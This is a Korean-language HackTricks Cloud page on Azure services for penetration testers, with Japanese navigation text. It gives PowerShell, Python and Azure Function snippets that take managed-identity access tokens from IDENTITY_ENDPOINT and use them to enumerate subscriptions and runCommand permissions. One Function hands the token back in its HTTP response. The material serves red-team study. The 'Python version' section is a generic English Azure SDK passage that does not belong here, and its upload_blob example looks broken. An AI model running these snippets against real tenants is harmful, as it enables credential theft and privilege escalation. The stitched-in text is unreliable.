Az - Services

htARTE (HackTricks AWS Red Team Expert)를 통해 AWS 해킹을 처음부터 전문가까지 배워보세요!

HackTricks를 지원하는 다른 방법:

회사를 HackTricks에서 광고하거나 HackTricks를 PDF로 다운로드하려면 SUBSCRIPTION PLANS를 확인하세요!
공식 PEASS & HackTricks 스웨그를 얻으세요.
The PEASS Family를 발견하세요. 독점적인 NFTs 컬렉션입니다.
💬 Discord 그룹 또는 텔레그램 그룹에 참여하거나 Twitter 🐦 @hacktricks_live를 팔로우하세요.
Hacking 트릭을 공유하려면 PR을 HackTricks 및 HackTricks Cloud github 저장소에 제출하세요.

포털

Microsoft 포털 목록은 https://msportals.io/에서 찾을 수 있습니다.

Raw 요청

Powershell을 통한 Azure API

IDENTITY_HEADER 및 IDENTITY_ENDPOINT에서 access_token을 가져옵니다: system('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER');.

그런 다음 Azure REST API를 쿼리하여 구독 ID 및 기타 정보를 얻습니다.

$Token = 'eyJ0eX..'
$URI = 'https://management.azure.com/subscriptions?api-version=2020-01-01'
# $URI = 'https://graph.microsoft.com/v1.0/applications'
$RequestParams = @{
Method = 'GET'
Uri = $URI
Headers = @{
'Authorization' = "Bearer $Token"
}
}
(Invoke-RestMethod @RequestParams).value

# List resources and check for runCommand privileges
$URI = 'https://management.azure.com/subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resources?api-version=2020-10-01'
$URI = 'https://management.azure.com/subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resourceGroups/<RG-NAME>/providers/Microsoft.Compute/virtualMachines/<RESOURCE/providers/Microsoft.Authorization/permissions?apiversion=2015-07-01'

Azure API를 사용하는 Python 버전

To interact with Azure services using Python, you can make use of the Azure SDK for Python. This SDK provides a set of libraries and tools that allow you to easily access and manage various Azure services programmatically.

To get started, you will need to install the Azure SDK for Python. You can do this by running the following command:

pip install azure

Once the SDK is installed, you can import the necessary modules in your Python script to interact with Azure services. For example, to work with Azure Blob Storage, you can import the azure.storage.blob module:

from azure.storage.blob import BlobServiceClient

You will also need to authenticate your Python script to access your Azure resources. This can be done by providing your Azure subscription credentials or by using Azure Active Directory (AAD) authentication.

To authenticate using your Azure subscription credentials, you can use the DefaultAzureCredential class from the azure.identity module:

from azure.identity import DefaultAzureCredential

credential = DefaultAzureCredential()

Alternatively, you can authenticate using Azure Active Directory (AAD) authentication. This requires registering an application in Azure AD and obtaining a client ID and client secret. You can then use the ClientSecretCredential class from the azure.identity module:

from azure.identity import ClientSecretCredential

tenant_id = "<your-tenant-id>"
client_id = "<your-client-id>"
client_secret = "<your-client-secret>"

credential = ClientSecretCredential(tenant_id, client_id, client_secret)

Once you have authenticated, you can create an instance of the Azure service client and start interacting with the service. For example, to create a BlobServiceClient instance for Azure Blob Storage, you can use the following code:

blob_service_client = BlobServiceClient(account_url="<your-account-url>", credential=credential)

You can then use the methods provided by the Azure service client to perform various operations on the service. For example, to upload a file to Azure Blob Storage, you can use the upload_blob method:

with open("<path-to-file>", "rb") as data:
    blob_service_client.upload_blob("<container-name>", "<blob-name>", data)

This is just a basic example of how to interact with Azure services using Python. The Azure SDK for Python provides a wide range of functionalities and features for working with different Azure services. You can refer to the official documentation for more information on how to use the SDK and its capabilities.

IDENTITY_ENDPOINT = os.environ['IDENTITY_ENDPOINT']
IDENTITY_HEADER = os.environ['IDENTITY_HEADER']

print("[+] Management API")
cmd = 'curl "%s?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:%s' % (IDENTITY_ENDPOINT, IDENTITY_HEADER)
val = os.popen(cmd).read()
print("Access Token: "+json.loads(val)["access_token"])
print("ClientID/AccountID: "+json.loads(val)["client_id"])

print("\r\n[+] Graph API")
cmd = 'curl "%s?resource=https://graph.microsoft.com/&api-version=2017-09-01" -H secret:%s' % (IDENTITY_ENDPOINT, IDENTITY_HEADER)
val = os.popen(cmd).read()
print(json.loads(val)["access_token"])
print("ClientID/AccountID: "+json.loads(val)["client_id"])

또는 Python 함수 내부에서:

import logging, os
import azure.functions as func

def main(req: func.HttpRequest) -> func.HttpResponse:
logging.info('Python HTTP trigger function processed a request.')
IDENTITY_ENDPOINT = os.environ['IDENTITY_ENDPOINT']
IDENTITY_HEADER = os.environ['IDENTITY_HEADER']
cmd = 'curl "%s?resource=https://management.azure.com&apiversion=2017-09-01" -H secret:%s' % (IDENTITY_ENDPOINT, IDENTITY_HEADER)
val = os.popen(cmd).read()
return func.HttpResponse(val, status_code=200)

서비스 목록

이 섹션의 페이지는 Azure 서비스별로 정렬되어 있습니다. 여기에서 각 서비스에 대한 정보(작동 방식 및 기능)와 각 서비스를 열거하는 방법을 찾을 수 있습니다.

htARTE (HackTricks AWS Red Team Expert)을 통해 제로부터 영웅이 되기까지 AWS 해킹을 배워보세요!

HackTricks를 지원하는 다른 방법:

회사를 HackTricks에서 광고하거나 HackTricks를 PDF로 다운로드하려면 SUBSCRIPTION PLANS를 확인하세요!
공식 PEASS & HackTricks 스웨그를 얻으세요.
The PEASS Family를 발견하세요. 독점적인 NFTs 컬렉션입니다.
💬 Discord 그룹 또는 텔레그램 그룹에 참여하거나 Twitter 🐦 @hacktricks_live를 팔로우하세요.
Hacking 트릭을 공유하려면 HackTricks 및 HackTricks Cloud github 저장소에 PR을 제출하세요.

前へAz - Password Spraying 次へAz - ACR

最終更新 2 か月前